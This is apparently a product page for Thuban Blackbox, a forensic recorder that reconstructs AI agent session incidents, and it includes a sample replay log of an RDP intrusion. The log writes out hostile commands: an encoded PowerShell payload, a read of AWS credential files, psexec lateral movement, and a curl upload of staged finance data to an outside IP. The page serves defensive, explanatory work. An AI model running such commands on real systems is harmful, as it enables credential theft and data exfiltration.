Blackbox forensic cube projecting a holographic incident timeline
Thuban Blackbox

Analyse anything. Execute nothing.

When frontier AI models refuse to examine attack evidence, Blackbox uses local forensic models with full evidence access and zero execution rights.

Get Blackbox See what it records
The Problem

Defenders were blocked from their own evidence

During the Hugging Face incident, defenders had roughly 17,000 attack events to analyse — command sequences, exploit payloads, exfiltration traffic. They fed the evidence to frontier AI models to accelerate triage. The models refused. Safety filters flagged the exploit code itself as the threat, not the incident it came from, and blocked the analysis outright.

Forensic workstation analysing attack evidence across multiple monitors
×

The attacker had no filter

Whoever wrote the payload ran it without asking permission. No safety policy stood between them and the target.

×

The defender's tools refused

Cloud frontier models classify exploit code as unsafe content and decline to summarise, explain or triage it — even for defensive analysis.

×

17,000 events, no accelerant

At that volume, manual triage without model assistance costs hours or days per analyst — time an active incident doesn't give you.

This is not a one-off. Any safety-aligned cloud model will refuse to analyse a live exploit, a credential-stealer, or an obfuscated payload — by design. The asymmetry is structural, and it favours the attacker every time defenders rely on the same refusal-prone models.

Architecture

Four layers, four separate jobs

Blackbox is one of four independent layers in Thuban. Each does exactly one job, none of them can do another's job, and that separation is enforced structurally — not by policy or prompt instructions that a compromised agent could talk its way around.

Blackbox forensic cube opening to reveal recorded incident data
01

Shield

Restricted production enforcement engine. Deterministic OS-level controls decide what an agent is allowed to do — no LLM in that decision path, so there's nothing to jailbreak.

02

Forge

Defence generation. Reads hostile evidence recorded by Blackbox to build new rules for Shield — it can propose a rule, but it has no execution rights of its own.

03

Crucible

Isolated security-research environment. Attacks candidate defences generated by Forge inside a sandbox that has no path back to production.

04

Blackbox

Local, open-weight forensic models. Full read access to recorded evidence, including hostile payloads — zero execution rights on the host, ever.

Why four separate layers instead of one smart agent: a single system that enforces, learns, tests and explains would need to trust its own analysis of hostile input before acting on it. Splitting the roles means the layer that reads hostile evidence (Blackbox) is structurally incapable of acting on it, and the layer that acts (Shield) never has to reason about anything it reads — it just enforces deterministic rules.

What It Is

A flight recorder for AI agent sessions

An aircraft black box doesn't stop the crash — it survives it, and it tells investigators exactly what happened. Thuban Blackbox is the same idea applied to AI agent sessions: it records everything an agent does, and when something goes wrong, it reconstructs the incident chain in full, from first command to final effect.

Thuban Shield monitoring dashboard on a desk monitor

What it is not

Not an application log with timestamps bolted on. Not a summary. Not something an agent — or an attacker who compromised an agent — can quietly edit after the fact.

What it is

A tamper-evident, chained recording of every action attempted, every decision Shield made about it, and every outcome — replayable end to end, analysable by local models with zero refusal policy standing in the way.

Shield enforces. Forge learns. Crucible proves. Blackbox explains.

How It Works

From raw event to human-readable finding

Blackbox runs every recorded event through a forensic pipeline — ingesting raw logs, parsing them, correlating them against known attack patterns, and generating the insight a human actually needs.

Blackbox forensic investigation pipeline: data ingestion, log parsing, correlation engine, insight generation, with branches to syslog, process logs, pattern matching, behaviour analysis and attack pattern reconstruction

1. Data ingestion & log parsing

Raw syslog, process logs, file-system events and network traffic are pulled in as they're recorded — structured, timestamped, and chained to the events before and after them.

2. Correlation engine

Pattern matching and behaviour analysis link individual events into sequences — a file write followed by a process spawn followed by an outbound connection stops being three separate log lines and becomes one incident.

3. Attack pattern reconstruction

Correlated sequences are matched against known attack stages — initial access, execution, privilege escalation, lateral movement, exfiltration — to reconstruct the chain an attacker actually followed.

4. Insight generation

Local open-weight models turn the reconstructed chain into a plain-language finding: what happened, what triggered it, what it touched, and what to do next.

Example Incident

What a reconstructed timeline actually looks like

This is a simplified excerpt from a Blackbox incident report — an agent session that started with a routine task and escalated into an RDP-based intrusion. Every line below is a real event class Blackbox records, not a paraphrase.

blackbox incident replay — session 8f3a21c
[00:00:00.112] INITIAL_ACCESS rdp connect 10.20.4.17:3389 user=svc_backup
[00:00:00.340] AUTH ✓ credential accepted (leaked service-account cred)
[00:00:04.881] PROCESS_SPAWN powershell.exe -enc JAB... ⚠ obfuscated payload
[00:00:04.902] FILE_ACCESS read C:\Users\svc_backup\.aws\credentials
[00:00:05.116] PRIVILEGE_ESCALATION whoami /priv → SeImpersonatePrivilege enabled
[00:00:05.204] PRIVILEGE_ESCALATION ✗ blocked by Shield token impersonation denied — policy: no-priv-escalation
[00:00:09.773] LATERAL_MOVEMENT psexec \\10.20.4.22 -u svc_backup ⚠ new host contacted
[00:00:12.590] DATA_STAGING 7z a archive.7z C:\Finance\*
[00:00:14.032] EXFILTRATION_ATTEMPT curl -T archive.7z https://185.220.xx.xx/up
[00:00:14.041] EXFILTRATION_ATTEMPT ✗ blocked by Shield outbound connection denied — policy: no-unlisted-egress
[00:00:14.055] SESSION_TERMINATED agent session killed reason: repeated policy violations

Branching decision paths

Blackbox doesn't just show the path the attacker took — it shows where Shield's deterministic rules blocked an escalation, and what would have happened if that rule didn't exist. The chain above shows two blocked branches: privilege escalation and exfiltration.

Analysed, not executed

The obfuscated PowerShell payload at 00:00:04.881 was decoded and summarised by a local model in the same report — without ever running it. That's the analyse-anything, execute-nothing boundary in practice.

What Blackbox Does

Every session, fully accounted for

Every protected session produces a complete, ordered record — not a sample, not a summary — and Blackbox can analyse hostile parts of that record without ever executing them.

Close-up of the Blackbox forensic cube showing internal circuit traces
01

Complete session timelines

Every command, file access and process spawn the agent attempted — with millisecond timestamps — recorded as it happened, not reconstructed afterward from partial logs.

02

Incident chain reconstruction

What command led to what effect. Blackbox maps the sequence from initial access through privilege escalation, lateral movement and exfiltration, in order.

03

Hostile payload analysis, local models only

Local, open-weight models examine exploit payloads and attack traces directly — no cloud refusal policy stands between you and the evidence.

04

Human-readable incident reports

Raw records become a report a human can actually use: what happened, why it was allowed to happen, what it touched, and the chain of evidence behind it.

05

Timeline reconstruction with branching paths

Shows not just what happened, but where it could have gone differently — every point where a rule blocked an escalation is visible in the reconstructed tree.

06

Entirely local, zero execution rights

No data leaves your machine, no cloud dependency. Full evidence access, and the analysis engine has zero rights to execute anything on the host.

Blackbox cube projecting a holographic command history tree with hex dumps on surrounding monitors
Why It Matters

Evidence, not a marketing claim

Anyone can say "we log everything." Blackbox is built so the record can't be quietly edited after an incident, and so a full session can be replayed rather than pieced together from fragments.

Incident investigation

Replay any session end to end to understand exactly what an agent did, in the order it did it, with the decisions Shield made at each step.

Rollback with full context

Reverse any action using the recorded before-state — not a best guess at what the file used to look like.

Compliance and audit evidence

When an auditor asks what your AI agents did last quarter, the answer isn't "we'll check" — it's already recorded, chained and ready to hand over.

Tamper-evident recording

Recordings can't be silently modified after the fact. If someone tries, the break in the chain is visible.

Blackbox timeline reconstruction showing initial access, file access, process spawn and privilege escalation stages with timestamps

Attackers do not have safety filters. Defenders still need safe access to the evidence. Blackbox analyses hostile agent behaviour locally — without giving it control of the machine.

Comparison

Logs vs. forensic evidence

A log file tells you something happened. Blackbox tells you exactly what happened, why it was allowed to happen, and how to undo it.

Blackbox Forensic Recorder showing a real incident chain: RDP intrusion, privilege escalation, lateral movement, data exfiltration, with timestamps
Capability Nothing App logs Thuban Blackbox
Records attempted vs allowed vs blocked attempted only, usually
Tamper-evident (chained records)
Full session replay
Rollback with recorded context
Audit-ready compliance evidence requires manual assembly

Analyse anything. Execute nothing.

See Blackbox included across Thuban plans.

View pricing